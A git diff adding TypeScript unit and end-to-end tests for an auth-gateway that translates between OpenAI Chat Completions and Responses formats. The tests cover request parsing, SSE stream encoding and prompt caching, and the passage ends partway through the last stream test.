000000000..31659ace9 --- /dev/null +++ b/packages/ai/test/auth-gateway-openai-chat.test.ts @@ -0,0 +1,295 @@ +import { describe, expect, it } from "bun:test"; +import { encodeResponse, encodeStream, parseRequest } from "../src/providers/openai-chat-server"; +import type { AssistantMessage, AssistantMessageEvent, AssistantMessageEventStream } from "../src/types"; + +function makeEventStream(events: AssistantMessageEvent[], final: AssistantMessage): AssistantMessageEventStream { + async function* iter() { + for (const e of events) yield e; + } + const stream = iter() as unknown as AssistantMessageEventStream; + (stream as { result(): Promise<AssistantMessage> }).result = async () => final; + return stream; +} + +async function collectStream(stream: ReadableStream<Uint8Array>): Promise<string[]> { + const reader = stream.getReader(); + const decoder = new TextDecoder(); + let buf = ""; + for (;;) { + const { value, done } = await reader.read(); + if (done) break; + buf += decoder.decode(value, { stream: true }); + } + buf += decoder.decode(); + return buf.split("\n\n").filter(s => s.length > 0); +} + +function parseSseLine(line: string): unknown { + const stripped = line.replace(/^data: /, ""); + if (stripped === "[DONE]") return "[DONE]"; + return JSON.parse(stripped); +} + +const baseUsage = { + input: 0, + output: 0, + cacheRead: 0, + cacheWrite: 0, + totalTokens: 0, + cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0, total: 0 }, +}; + +function emptyAssistant(): AssistantMessage { + return { + role: "assistant", + content: [], + api: "openai-completions", + provider: "openai", + model: "gpt-test", + usage: baseUsage, + stopReason: "stop", + timestamp: 0, + }; +} + +describe("auth-gateway openai-chat: parseRequest", () => { + it("converts a full request into a Context", () => { + const parsed = parseRequest({ + model: "gpt-5.2", + messages: [ + { role: "system", content: "you are X" }, + { role: "system", content: "also Y" }, + { role: "user", content: "hi" }, + { + role: "assistant", + content: "hello", + tool_calls: [ + { + id: "call_1", + type: "function", + function: { name: "lookup", arguments: '{"q":"a"}' }, + }, + { + id: "call_2", + type: "function", + function: { name: "broken", arguments: "not-json" }, + }, + ], + }, + { role: "tool", tool_call_id: "call_1", content: "result-text" }, + ], + tools: [ + { + type: "function", + function: { + name: "lookup", + description: "look something up", + parameters: { type: "object", properties: { q: { type: "string" } } }, + }, + }, + ], + stream: true, + max_tokens: 512, + max_completion_tokens: 1024, + temperature: 0.2, + top_p: 0.9, + stop: ["\n\n"], + tool_choice: { type: "function", function: { name: "lookup" } }, + response_format: { type: "json_object" }, + stream_options: { include_usage: true }, + }); + + expect(parsed.modelId).toBe("gpt-5.2"); + expect(parsed.stream).toBe(true); + expect(parsed.context.systemPrompt).toEqual(["you are X\n\nalso Y"]); + expect(parsed.context.messages).toHaveLength(3); + + const [user, assistant, tool] = parsed.context.messages; + expect(user.role).toBe("user"); + expect(assistant.role).toBe("assistant"); + if (assistant.role !== "assistant") throw new Error("unreachable"); + expect(assistant.api).toBe("openai-completions"); + expect(assistant.provider).toBe("openai"); + expect(assistant.model).toBe("gpt-5.2"); + expect(assistant.content[0]).toEqual({ type: "text", text: "hello" }); + const call1 = assistant.content[1]; + const call2 = assistant.content[2]; + if (call1.type !== "toolCall" || call2.type !== "toolCall") throw new Error("unreachable"); + expect(call1.id).toBe("call_1"); + expect(call1.name).toBe("lookup"); + expect(call1.arguments).toEqual({ q: "a" }); + // Un-parseable args fall back to __raw passthrough. + expect(call2.arguments).toEqual({ __raw: "not-json" }); + + expect(tool.role).toBe("toolResult"); + if (tool.role !== "toolResult") throw new Error("unreachable"); + expect(tool.toolCallId).toBe("call_1"); + expect(tool.toolName).toBe(""); + expect(tool.content).toEqual([{ type: "text", text: "result-text" }]); + + expect(parsed.context.tools).toHaveLength(1); + expect(parsed.context.tools?.[0].name).toBe("lookup"); + + // max_completion_tokens wins over max_tokens. + expect(parsed.options.maxOutputTokens).toBe(1024); + expect(parsed.options.temperature).toBe(0.2); + expect(parsed.options.topP).toBe(0.9); + expect(parsed.options.stopSequences).toEqual(["\n\n"]); + expect(parsed.options.toolChoice).toEqual({ name: "lookup" }); + expect(parsed.options.responseFormat).toEqual({ type: "json_object" }); + expect(parsed.options.extra).toEqual({ includeStreamingUsage: true }); + }); + + it("rejects missing required fields", () => { + expect(() => parseRequest({ messages: [] })).toThrow(/model/); + expect(() => parseRequest({ model: "x" })).toThrow(/messages/); + }); + + it("falls back to max_tokens when max_completion_tokens is absent", () => { + const parsed = parseRequest({ model: "m", messages: [], max_tokens: 256 }); + expect(parsed.options.maxOutputTokens).toBe(256); + expect(parsed.stream).toBe(false); + }); +}); + +describe("auth-gateway openai-chat: encodeResponse", () => { + it("serializes text + tool calls with finish_reason=tool_calls", () => { + const message: AssistantMessage = { + ...emptyAssistant(), + content: [ + { type: "text", text: "the answer is " }, + { type: "thinking", thinking: "private reasoning" }, // dropped + { type: "toolCall", id: "call_42", name: "compute", arguments: { x: 1 } }, + ], + usage: { ...baseUsage, input: 10, output: 20, cacheRead: 4, cacheWrite: 6, totalTokens: 40 }, + stopReason: "toolUse", + }; + + const out = encodeResponse(message, "gpt-5.2"); + expect(out.object).toBe("chat.completion"); + expect(out.model).toBe("gpt-5.2"); + expect(typeof out.id).toBe("string"); + expect(String(out.id).startsWith("chatcmpl-")).toBe(true); + + const choices = out.choices as Array<{ + index: number; + message: { role: string; content: string | null; tool_calls?: unknown }; + finish_reason: string; + }>; + expect(choices).toHaveLength(1); + expect(choices[0].finish_reason).toBe("tool_calls"); + expect(choices[0].message.role).toBe("assistant"); + expect(choices[0].message.content).toBe("the answer is "); + expect(choices[0].message.tool_calls).toEqual([ + { id: "call_42", type: "function", function: { name: "compute", arguments: '{"x":1}' } }, + ]); + + expect(out.usage).toEqual({ + prompt_tokens: 20, + prompt_tokens_details: { cached_tokens: 4 }, + completion_tokens: 20, + total_tokens: 40, + }); + }); + + it("maps length stop reason and emits null content when text is empty", () => { + const message: AssistantMessage = { ...emptyAssistant(), stopReason: "length" }; + const out = encodeResponse(message, "gpt-test"); + const choices = out.choices as Array<{ finish_reason: string; message: { content: string | null } }>; + expect(choices[0].finish_reason).toBe("length"); + expect(choices[0].message.content).toBeNull(); + }); +}); + +describe("auth-gateway openai-chat: encodeStream", () => { + it("emits role chunk, text deltas, tool_call deltas with sequential indexes, then [DONE]", async () => { + const partial = emptyAssistant(); + // Pre-populate partial.content so toolcall_start can look up id/name by contentIndex. + partial.content = [ + { type: "text", text: "" }, + { type: "toolCall", id: "call_A", name: "tool_a", arguments: {} }, + { type: "toolCall", id: "call_B", name: "tool_b", arguments: {} }, + ]; + const events: AssistantMessageEvent[] = [ + { type: "text_start", contentIndex: 0, partial }, + { type: "text_delta", contentIndex: 0, delta: "Hi ", partial }, + { type: "text_delta", contentIndex: 0, delta: "there", partial }, + { type: "text_end", contentIndex: 0, content: "Hi there", partial }, + { type: "toolcall_start", contentIndex: 1, partial }, + { type: "toolcall_delta", contentIndex: 1, delta: '{"a":', partial }, + { type: "toolcall_delta", contentIndex: 1, delta: "1}", partial }, + { type: "toolcall_start", contentIndex: 2, partial }, + { type: "toolcall_delta", contentIndex: 2, delta: "{}", partial }, + { + type: "done", + reason: "toolUse", + message: { ...partial, stopReason: "toolUse" }, + }, + ]; + + const stream = encodeStream(makeEventStream(events, partial), "gpt-5.2"); + const lines = await collectStream(stream); + const payloads = lines.map(parseSseLine); + + expect(payloads[payloads.length - 1]).toBe("[DONE]"); + + const chunks = payloads.slice(0, -1) as Array<{ + id: string; + object: string; + model: string; + choices: Array<{ delta: Record<string, unknown>; finish_reason: string | null }>; + }>; + + // First chunk is the role announcement. + expect(chunks[0].object).toBe("chat.completion.chunk"); + expect(chunks[0].model).toBe("gpt-5.2"); + expect(chunks[0].choices[0].delta).toEqual({ role: "assistant" }); + expect(chunks[0].choices[0].finish_reason).toBeNull(); + + // All chunks share the same id. + const id = chunks[0].id; + for (const c of chunks) expect(c.id).toBe(id); + + // Collect text deltas. + const textDeltas = chunks.map(c => c.choices[0].delta.content).filter((v): v is string => typeof v === "string"); + expect(textDeltas.join("")).toBe("Hi there"); + + // Collect tool_call deltas; verify index sequence. + const toolDeltas: Array<{ index: number; id?: string; function?: { name?: string; arguments?: string } }> = []; + for (const c of chunks) { + const tc = c.choices[0].delta.tool_calls; + if (Array.isArray(tc)) toolDeltas.push(...(tc as typeof toolDeltas)); + } + // Two starts (index 0 and 1, NOT contentIndex 1 and 2) plus three arg deltas. + const starts = toolDeltas.filter(t => typeof t.id === "string" && t.id.length > 0); + expect(starts.map(s => s.index)).toEqual([0, 1]); + expect(starts[0].id).toBe("call_A"); + expect(starts[0].function?.name).toBe("tool_a"); + expect(starts[1].id).toBe("call_B"); + expect(starts[1].function?.name).toBe("tool_b"); + + // Argument deltas use the wire index, not the contentIndex. + const argDeltas = toolDeltas.filter(t => typeof t.function?.arguments === "string" && !t.id); + expect(argDeltas.map(d => [d.index, d.function?.arguments])).toEqual([ + [0, '{"a":'], + [0, "1}"], + [1, "{}"], + ]); + + // Penultimate chunk carries finish_reason. + const finishChunk = chunks[chunks.length - 1]; + expect(finishChunk.choices[0].delta).toEqual({}); + expect(finishChunk.choices[0].finish_reason).toBe("tool_calls"); + }); + + it("emits an error envelope when the stream errors", async () => { + const partial = emptyAssistant(); + const errorMessage: AssistantMessage = { ...partial, errorMessage: "upstream went away" }; + const events: AssistantMessageEvent[] = [{ type: "error", reason: "error", error: errorMessage }]; + const stream = encodeStream(makeEventStream(events, partial), "gpt-test"); + const lines = await collectStream(stream); + expect(lines).toHaveLength(2); // role chunk + error envelope + const payloads = lines.map(parseSseLine) as Array<Record<string, unknown>>; + expect(payloads[1]).toEqual({ error: { message: "upstream went away", type: "upstream_error" } }); + }); +}); diff --git a/packages/ai/test/auth-gateway-openai-responses-caching.test.ts b/packages/ai/test/auth-gateway-openai-responses-caching.test.ts new file mode 100644 index 000000000..021033ac5 --- /dev/null +++ b/packages/ai/test/auth-gateway-openai-responses-caching.test.ts @@ -0,0 +1,202 @@ +/** + * E2E test: exercise an OpenAI Responses conversation through a live + * auth-gateway and assert automatic prompt caching round-trips. OpenAI + * Responses caches prefixes ≥1024 tokens automatically — no explicit + * `cache_control` markers — so the bug surface is "did we keep the prefix + * byte-identical across the two turns" and "did we surface + * input_tokens_details.cached_tokens in the response usage block". + * + * Skips unless a local gateway is reachable at the default `127.0.0.1:4000` + * (override via `OMP_E2E_GATEWAY_URL`) AND the bearer token file exists at + * `~/.omp/auth-gateway.token`. + * + * To run: `bun --cwd packages/ai test test/auth-gateway-openai-responses-caching.test.ts` + * with the gateway live (`omp auth-gateway serve` or pm2). + */ +import { describe, expect, it } from "bun:test"; +import * as os from "node:os"; +import * as path from "node:path"; +import { isEnoent } from "@oh-my-pi/pi-utils"; + +interface OpenAIResponsesUsage { + input_tokens: number; + output_tokens: number; + input_tokens_details?: { cached_tokens?: number }; + output_tokens_details?: { reasoning_tokens?: number }; + total_tokens?: number; +} + +interface OpenAIResponse { + status?: string; + output?: Array<{ + type: string; + content?: Array<{ type: string; text?: string }>; + }>; + usage: OpenAIResponsesUsage; + error?: { type?: string; message: string }; +} + +const GATEWAY_URL = Bun.env.OMP_E2E_GATEWAY_URL ?? "http://127.0.0.1:4000"; +const TOKEN_PATH = path.join(os.homedir(), ".omp", "auth-gateway.token"); +// `gpt-5.3-codex` is the model we've verified the ChatGPT-subscription Codex +// backend accepts; older or higher-tier ids 4xx with "model not supported". +const MODEL = Bun.env.OMP_E2E_OPENAI_RESPONSES_MODEL ?? "gpt-5.3-codex"; + +async function checkGatewayAvailable(): Promise<{ ok: boolean; token?: string; reason?: string }> { + let token: string; + try { + token = (await Bun.file(TOKEN_PATH).text()).trim(); + } catch (err) { + if (isEnoent(err)) return { ok: false, reason: `no token at ${TOKEN_PATH}` }; + throw err; + } + if (!token) return { ok: false, reason: `empty token at ${TOKEN_PATH}` }; + try { + const res = await fetch(`${GATEWAY_URL}/healthz`, { signal: AbortSignal.timeout(2_000) }); + if (!res.ok) return { ok: false, reason: `healthz returned ${res.status}` }; + } catch (err) { + const msg = err instanceof Error ? err.message : String(err); + return { ok: false, reason: `healthz unreachable: ${msg}` }; + } + return { ok: true, token }; +} + +const gateway = await checkGatewayAvailable(); + +// Long deterministic instructions, repeated to clear OpenAI's 1024-token +// automatic-caching floor with plenty of headroom. +const INSTRUCTIONS_PARAGRAPH = ` +You are a precise assistant participating in an automated end-to-end test of +the omp auth-gateway's OpenAI Responses prompt-caching pipeline. The same +instructions block will be reused across two turns; OpenAI automatically +caches identical prefixes ≥1024 tokens, so the second turn must see the +same prefix bytes as the first or the cache misses silently. Always respond +with extreme brevity: a single short word or phrase, never more than five +tokens. Do not add filler, do not add explanations, do not add punctuation +beyond what is strictly necessary. If asked to confirm something, respond +with "yes". If asked to deny, respond with "no". If asked to repeat your +previous reply, repeat it verbatim. Reasoning, hedging, and conversational +preamble are strictly forbidden. This block is intentionally verbose so the +caching threshold is comfortably cleared on every run; please disregard the +verbosity itself and follow the brevity rule above. +`.trim(); + +const INSTRUCTIONS = Array.from({ length: 12 }, () => INSTRUCTIONS_PARAGRAPH).join("\n\n"); + +interface ResponseInputMessage { + role: "user" | "assistant" | "developer" | "system"; + content: string | Array<{ type: string; text?: string }>; +} + +async function callGateway(body: unknown, token: string): Promise<OpenAIResponse> { + const res = await fetch(`${GATEWAY_URL}/v1/responses`, { + method: "POST", + headers: { + "Content-Type": "application/json", + Authorization: `Bearer ${token}`, + }, + body: JSON.stringify(body), + }); + const text = await res.text(); + let parsed: OpenAIResponse; + try { + parsed = JSON.parse(text) as OpenAIResponse; + } catch { + throw new Error(`gateway returned non-JSON (status=${res.status}): ${text.slice(0, 200)}`); + } + if (parsed.error) { + throw new Error(`gateway error: ${parsed.error.type ?? "unknown"}: ${parsed.error.message}`); + } + return parsed; +} + +function extractAssistantText(res: OpenAIResponse): string { + for (const item of res.output ?? []) { + if (item.type !== "message") continue; + const block = item.content?.find(c => c.type === "output_text"); + if (block?.text) return block.text; + } + return ""; +} + +describe.skipIf(!gateway.ok)("auth-gateway: openai-responses prompt caching e2e", () => { + if (!gateway.ok) { + console.warn(`[skip] openai-responses caching e2e: ${gateway.reason}`); + return; + } + const token = gateway.token; + if (!token) throw new Error("invariant: token must be present when gateway.ok is true"); + + it("automatically caches the instructions prefix across two turns", async () => { + // Per-run nonce ensures we always start with a cold cache. The bytes + // before the cacheable prefix boundary must be unique to this run; + // otherwise a previously-warm cache entry silently hits on turn 1 + // and we lose the ability to assert "first turn cold, second turn warm". + const nonce = `${Date.now().toString(36)}-${crypto.randomUUID()}`; + // Prepend (not append) — OpenAI caches at prefix-tree granularity, so the + // first chunk must differ across runs to guarantee a cold start. + const instructionsWithNonce = `[run-nonce: ${nonce}]\n\n${INSTRUCTIONS}`; + // Stable per-run cache key. The ChatGPT-subscription Codex backend + // only coalesces prefixes across requests when an explicit + // `prompt_cache_key` is set — caching is opt-in there, unlike public + // OpenAI Responses which caches automatically. Reusing the same key + // across both turns is the contract that makes turn 2 hit. + const cacheKey = `omp-e2e-${nonce}`; + + // ── Turn 1 ─────────────────────────────────────────────────────── + const turn1Input: ResponseInputMessage[] = [{ role: "user", content: "Respond with the single word: alpha" }]; + const turn1 = await callGateway( + { + model: MODEL, + max_output_tokens: 64, + instructions: instructionsWithNonce, + prompt_cache_key: cacheKey, + input: turn1Input, + }, + token, + ); + + const turn1Text = extractAssistantText(turn1); + + expect(turn1Text.length).toBeGreaterThan(0); + + // First turn cannot hit the cache (nothing to read yet thanks to the nonce). + const turn1Cached = turn1.usage.input_tokens_details?.cached_tokens ?? 0; + expect(turn1Cached).toBe(0); + // Confirm the request actually crossed the 1024-token caching floor; + // otherwise OpenAI never registers a cache entry and turn 2 can't + // possibly read. + expect(turn1.usage.input_tokens).toBeGreaterThan(1024); + + // ── Turn 2: append assistant + new user, re-send with same instructions ── + const turn2Input: ResponseInputMessage[] = [ + ...turn1Input, + { role: "assistant", content: turn1Text }, + { role: "user", content: "Respond with the single word: beta" }, + ]; + const turn2 = await callGateway( + { + prompt_cache_key: cacheKey, + model: MODEL, + max_output_tokens: 64, + instructions: instructionsWithNonce, + input: turn2Input, + }, + token, + ); + + const turn2Text = extractAssistantText(turn2); + expect(turn2Text.length).toBeGreaterThan(0); + + // Second turn MUST hit the cache populated by turn 1. If + // cached_tokens is 0, the gateway either mutated the prefix bytes + // between turns or failed to surface input_tokens_details from the + // upstream usage block. + const turn2Cached = turn2.usage.input_tokens_details?.cached_tokens ?? 0; + expect(turn2Cached).toBeGreaterThan(0); + // The cached prefix should cover at least the instructions block we + // established on turn 1 — sanity check that we're not catching a + // trivial 64-token overlap. + expect(turn2Cached).toBeGreaterThan(1024); + }, 90_000); +}); diff --git a/packages/ai/test/auth-gateway-openai-responses.test.ts b/packages/ai/test/auth-gateway-openai-responses.test.ts new file mode 100644 index 000000000..fe3a21801 --- /dev/null +++ b/packages/ai/test/auth-gateway-openai-responses.test.ts @@ -0,0 +1,531 @@ +import { describe, expect, it } from "bun:test"; +import { Effort } from "../src/model-thinking"; +import { encodeResponse, encodeStream, parseRequest } from "../src/providers/openai-responses-server"; +import type { AssistantMessage } from "../src/types"; +import { AssistantMessageEventStream } from "../src/utils/event-stream"; + +function zeroUsage(): AssistantMessage["usage"] { + return { + input: 0, + output: 0, + cacheRead: 0, + cacheWrite: 0, + totalTokens: 0, + cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0, total: 0 }, + }; +} + +async function collectStream(stream: ReadableStream<Uint8Array>): Promise<string> { + const reader = stream.getReader(); + const decoder = new TextDecoder(); + let out = ""; + while (true) { + const { value, done } = await reader.read(); + if (done) break; + out += decoder.decode(value); + } + return out; +} + +interface SseFrame { + event: string; + data: Record<string, unknown> | string; +} + +function parseSse(raw: string): SseFrame[] { + const frames: SseFrame[] = []; + for (const chunk of raw.split("\n\n")) { + if (!chunk.trim()) continue; + let event = ""; + let dataLine = ""; + for (const line of chunk.split("\n")) { + if (line.startsWith("event: ")) event = line.slice("event: ".length); + else if (line.startsWith("data: ")) dataLine = line.slice("data: ".length); + } + if (dataLine === "[DONE]") { + frames.push({ event: event || "done_sentinel", data: "[DONE]" }); + } else if (dataLine) { + const parsed: unknown = JSON.parse(dataLine); + if (parsed && typeof parsed === "object") { + frames.push({ event, data: parsed as Record<string, unknown> }); + } + } + } + return frames; +} + +describe("openai-responses parseRequest", () => { + it("parses an input array with mixed message + reasoning + function_call + function_call_output", () => { + const reasoningItem = { + type: "reasoning", + id: "rs_abc", + summary: [{ type: "summary_text", text: "The user wants arithmetic." }], + }; + const parsed = parseRequest({ + model: "gpt-5.3-codex-spark", + instructions: "You are X", + input: [ + { type: "message", role: "user", content: [{ type: "input_text", text: "what's 2+2?" }] }, + { + type: "message", + role: "assistant", + content: [{ type: "output_text", text: "Let me think." }], + }, + reasoningItem, + { + type: "function_call", + id: "fc_item_999", + call_id: "call_42", + name: "math", + arguments: '{"a":2,"b":2}', + }, + { type: "function_call_output", call_id: "call_42", output: "4" }, + ], + tools: [ + { + type: "function", + name: "math", + description: "Do arithmetic", + parameters: { type: "object", properties: { a: { type: "number" }, b: { type: "number" } } }, + strict: true, + }, + ], + tool_choice: { type: "function", name: "math" }, + max_output_tokens: 1024, + temperature: 0.1, + top_p: 0.9, + reasoning: { effort: "high", summary: "detailed" }, + store: true, + previous_response_id: "resp_prev", + stream: true, + }); + + expect(parsed.modelId).toBe("gpt-5.3-codex-spark"); + expect(parsed.stream).toBe(true); + expect(parsed.context.systemPrompt).toEqual(["You are X"]); + + const msgs = parsed.context.messages; + expect(msgs).toHaveLength(3); + + // 1. user + expect(msgs[0]!.role).toBe("user"); + const u = msgs[0]!; + if (u.role !== "user") throw new Error("expected user"); + expect(u.content).toBe("what's 2+2?"); + + // 2. assistant with text + reasoning + toolCall + const a = msgs[1]!; + if (a.role !== "assistant") throw new Error("expected assistant"); + expect(a.api).toBe("openai-responses"); + expect(a.provider).toBe("openai"); + expect(a.model).toBe("gpt-5.3-codex-spark"); + expect(a.content).toHaveLength(3); + expect(a.content[0]).toMatchObject({ type: "text", text: "Let me think." }); + expect(a.content[1]).toMatchObject({ + type: "thinking", + thinking: "The user wants arithmetic.", + thinkingSignature: JSON.stringify(reasoningItem), + itemId: "rs_abc", + }); + // Critical: call_id and item id are distinct. + expect(a.content[2]).toMatchObject({ + type: "toolCall", + id: "call_42", + name: "math", + arguments: { a: 2, b: 2 }, + thoughtSignature: "fc_item_999", + }); + + // 3. toolResult + const tr = msgs[2]!; + if (tr.role !== "toolResult") throw new Error("expected toolResult"); + expect(tr.toolCallId).toBe("call_42"); + expect(tr.toolName).toBe("math"); + expect(tr.content).toEqual([{ type: "text", text: "4" }]); + expect(tr.isError).toBe(false); + + expect(parsed.context.tools).toHaveLength(1); + expect(parsed.context.tools![0]).toMatchObject({ name: "math", strict: true }); + + expect(parsed.options.maxOutputTokens).toBe(1024); + expect(parsed.options.temperature).toBe(0.1); + expect(parsed.options.topP).toBe(0.9); + expect(parsed.options.toolChoice).toEqual({ name: "math" }); + expect(parsed.options.reasoning).toBe(Effort.High); + // `reasoning.summary: "detailed"` is treated as the default visible-summary + // case (only "none" toggles hideThinkingSummary). + expect(parsed.options.hideThinkingSummary).toBeUndefined(); + // `store` and `previous_response_id` are accepted by the schema but not + // plumbed through pi-ai — they no longer leak into options.extra. + expect(parsed.options.extra).toBeUndefined(); + }); + + it("accepts a bare string input and rejects a missing model", () => { + const parsed = parseRequest({ model: "m", input: "hi" }); + expect(parsed.context.messages).toHaveLength(1); + const m = parsed.context.messages[0]!; + if (m.role !== "user") throw new Error("expected user"); + expect(m.content).toBe("hi"); + + expect(() => parseRequest({ input: "hi" })).toThrow(/model/); + }); + + it("preserves string message content and system input items", () => { + const parsed = parseRequest({ + model: "m", + instructions: "top-level instructions", + input: [ + { role: "system", content: "system from easy input" }, + { role: "user", content: "hello" }, + { role: "assistant", content: "hi there" }, + { + type: "message", + role: "system", + content: [{ type: "input_text", text: "structured system" }], + }, + ], + }); + + expect(parsed.context.systemPrompt).toEqual([ + "top-level instructions", + "system from easy input", + "structured system", + ]); + expect(parsed.context.messages).toHaveLength(2); + const user = parsed.context.messages[0]!; + const assistant = parsed.context.messages[1]!; + if (user.role !== "user") throw new Error("expected user"); + if (assistant.role !== "assistant") throw new Error("expected assistant"); + expect(user.content).toBe("hello"); + expect(assistant.content).toEqual([{ type: "text", text: "hi there" }]); + }); + + it("creates a synthetic assistant when reasoning comes before any assistant message", () => { + const reasoningItem = { + type: "reasoning", + id: "rs_x", + content: [{ type: "reasoning_text", text: "hmm" }], + }; + const parsed = parseRequest({ + model: "m", + input: [reasoningItem], + }); + expect(parsed.context.messages).toHaveLength(1); + const a = parsed.context.messages[0]!; + if (a.role !== "assistant") throw new Error("expected synthetic assistant"); + expect(a.content).toHaveLength(1); + expect(a.content[0]).toMatchObject({ + type: "thinking", + thinking: "hmm", + thinkingSignature: JSON.stringify(reasoningItem), + itemId: "rs_x", + }); + }); +}); + +describe("openai-responses encodeResponse", () => { + it("encodes reasoning + message + function_call output items", () => { + const reasoningItem = { + type: "reasoning", + id: "rs_signed", + summary: [{ type: "summary_text", text: "thinking aloud" }], + }; + const message: AssistantMessage = { + role: "assistant", + api: "openai-responses", + provider: "openai", + model: "gpt-5", + content: [ + { + type: "thinking", + thinking: "thinking aloud", + thinkingSignature: JSON.stringify(reasoningItem), + itemId: "rs_signed", + }, + { type: "text", text: "Hello " }, + { type: "text", text: "world" }, + { + type: "toolCall", + id: "call_t1", + name: "math", + arguments: { a: 1, b: 2 }, + thoughtSignature: "fc_item_t1", + }, + ], + usage: { + ...zeroUsage(), + input: 10, + output: 20, + cacheRead: 4, + cacheWrite: 6, + reasoningTokens: 5, + }, + stopReason: "toolUse", + timestamp: 1_700_000_000_000, + }; + + const body = encodeResponse(message, "gpt-5-requested"); + + expect(body.object).toBe("response"); + expect(body.status).toBe("completed"); + expect(body.model).toBe("gpt-5-requested"); + expect(body.created_at).toBe(1_700_000_000); + expect(typeof body.id).toBe("string"); + expect((body.id as string).startsWith("resp_")).toBe(true); + + const output = body.output as Array<Record<string, unknown>>; + expect(output).toHaveLength(3); + + expect(output[0]).toEqual(reasoningItem); + + // Consecutive text collapses into one message item with two parts. + expect(output[1]!.type).toBe("message"); + expect(output[1]!.role).toBe("assistant"); + const parts = output[1]!.content as Array<{ type: string; text: string; annotations: never[] }>; + expect(parts).toEqual([ + { type: "output_text", text: "Hello ", annotations: [] }, + { type: "output_text", text: "world", annotations: [] }, + ]); + + // function_call: wire id (thoughtSignature) and call_id are distinct. + expect(output[2]).toMatchObject({ + type: "function_call", + id: "fc_item_t1", + call_id: "call_t1", + name: "math", + arguments: '{"a":1,"b":2}', + status: "completed", + }); + + expect(body.usage).toEqual({ + input_tokens: 20, + input_tokens_details: { cached_tokens: 4 }, + output_tokens: 20, + output_tokens_details: { reasoning_tokens: 5 }, + total_tokens: 40, + }); + }); + + it("marks length-limited responses incomplete", () => { + const message: AssistantMessage = { + role: "assistant", + api: "openai-responses", + provider: "openai", + model: "gpt-5", + content: [{ type: "text", text: "partial" }], + usage: zeroUsage(), + stopReason: "length", + timestamp: 1_700_000_000_000, + }; + + const body = encodeResponse(message, "gpt-5-requested"); + + expect(body.status).toBe("incomplete"); + expect(body.incomplete_details).toEqual({ reason: "max_output_tokens" }); + }); +}); + +describe("openai-responses encodeStream", () => { + it("emits response.created, reasoning_summary_text.delta, output_text.delta, function_call_arguments.delta, response.completed, [DONE]", async () => { + const stream = new AssistantMessageEventStream(); + + const partial: AssistantMessage = { + role: "assistant", + api: "openai-responses", + provider: "openai", + model: "gpt-5", + content: [], + usage: zeroUsage(), + stopReason: "stop", + timestamp: 1_700_000_000_000, + }; + + const finalMessage: AssistantMessage = { + role: "assistant", + api: "openai-responses", + provider: "openai", + model: "gpt-5", + content: [ + { type: "thinking", thinking: "step 1", thinkingSignature: "rs_s1", itemId: "rs_s1" }, + { type: "text", text: "Hi!" }, + { + type: "toolCall", + id: "call_x", + name: "math", + arguments: { a: 1 }, + thoughtSignature: "fc_x", + }, + ], + usage: { ...zeroUsage(), input: 1, output: 2 }, + stopReason: "toolUse", + timestamp: 1_700_000_000_000, + }; + + // Push events asynchronously while consumer reads. + const partialWithThinking: AssistantMessage = { + ...partial, + content: [{ type: "thinking", thinking: "", thinkingSignature: "rs_s1", itemId: "rs_s1" }], + }; + const partialWithToolCall: AssistantMessage = { + ...partial, + content: [ + { type: "thinking", thinking: "step 1", thinkingSignature: "rs_s1", itemId: "rs_s1" }, + { type: "text", text: "Hi!" }, + { type: "toolCall", id: "call_x", name: "math", arguments: {}, thoughtSignature: "fc_x" }, + ], + }; + + queueMicrotask(() => { + stream.push({ type: "start", partial }); + stream.push({ type: "thinking_start", contentIndex: 0, partial: partialWithThinking }); + stream.push({ type: "thinking_delta", contentIndex: 0, delta: "step ", partial: partialWithThinking }); + stream.push({ type: "thinking_delta", contentIndex: 0, delta: "1", partial: partialWithThinking }); + stream.push({ type: "thinking_end", contentIndex: 0, content: "step 1", partial: partialWithThinking }); + stream.push({ type: "text_start", contentIndex: 1, partial }); + stream.push({ type: "text_delta", contentIndex: 1, delta: "Hi", partial }); + stream.push({ type: "text_delta", contentIndex: 1, delta: "!", partial }); + stream.push({ type: "text_end", contentIndex: 1, content: "Hi!", partial }); + stream.push({ type: "toolcall_start", contentIndex: 2, partial: partialWithToolCall }); + stream.push({ type: "toolcall_delta", contentIndex: 2, delta: '{"a":', partial: partialWithToolCall }); + stream.push({ type: "toolcall_delta", contentIndex: 2, delta: "1}", partial: partialWithToolCall }); + stream.push({ + type: "toolcall_end", + contentIndex: 2, + toolCall: { + type: "toolCall", + id: "call_x", + name: "math", + arguments: { a: 1 }, + thoughtSignature: "fc_x", + }, + partial: partialWithToolCall, + }); + stream.push({ type: "done", reason: "toolUse", message: finalMessage }); + }); + + const raw = await collectStream(encodeStream(stream, "gpt-5-requested")); + const frames = parseSse(raw); + const names = frames.map(f => f.event); + + // Ordering: created → thinking flow → message flow → tool-call flow → completed → [DONE] + expect(names[0]).toBe("response.created"); + expect(names[names.length - 1]).toBe("done_sentinel"); + expect(frames[frames.length - 1]!.data).toBe("[DONE]"); + + // Spot-check critical events appear in the expected order. + const idxCreated = names.indexOf("response.created"); + const idxReasoningDelta = names.indexOf("response.reasoning_summary_text.delta"); + const idxReasoningDone = names.indexOf("response.reasoning_summary_text.done"); + const idxTextDelta = names.indexOf("response.output_text.delta"); + const idxTextDone = names.indexOf("response.output_text.done"); + const idxArgsDelta = names.indexOf("response.function_call_arguments.delta"); + const idxMessageDone = frames.findIndex( + f => + f.event === "response.output_item.done" && + (f.data as Record<string, unknown>).item && + ((f.data as Record<string, unknown>).item as Record<string, unknown>).type === "message", + ); + const idxArgsDone = names.indexOf("response.function_call_arguments.done"); + const idxCompleted = names.indexOf("response.completed"); + + expect(idxCreated).toBeGreaterThanOrEqual(0); + expect(idxReasoningDelta).toBeGreaterThan(idxCreated); + expect(idxReasoningDone).toBeGreaterThan(idxReasoningDelta); + expect(idxTextDelta).toBeGreaterThan(idxReasoningDone); + expect(idxTextDone).toBeGreaterThan(idxTextDelta); + expect(idxArgsDelta).toBeGreaterThan(idxTextDone); + expect(idxArgsDone).toBeGreaterThan(idxArgsDelta); + expect(idxCompleted).toBeGreaterThan(idxArgsDone); + + // reasoning_summary_text.delta must carry item_id matching the signature, and output_index 0. + const reasoningDelta = frames[idxReasoningDelta]!.data as Record<string, unknown>; + expect(reasoningDelta.item_id).toBe("rs_s1"); + expect(reasoningDelta.output_index).toBe(0); + expect(reasoningDelta.delta).toBe("step "); + + // output_text.delta's item_id is a new msg_*, output_index moved on past the reasoning item. + const textDelta = frames[idxTextDelta]!.data as Record<string, unknown>; + expect(typeof textDelta.item_id).toBe("string"); + expect((textDelta.item_id as 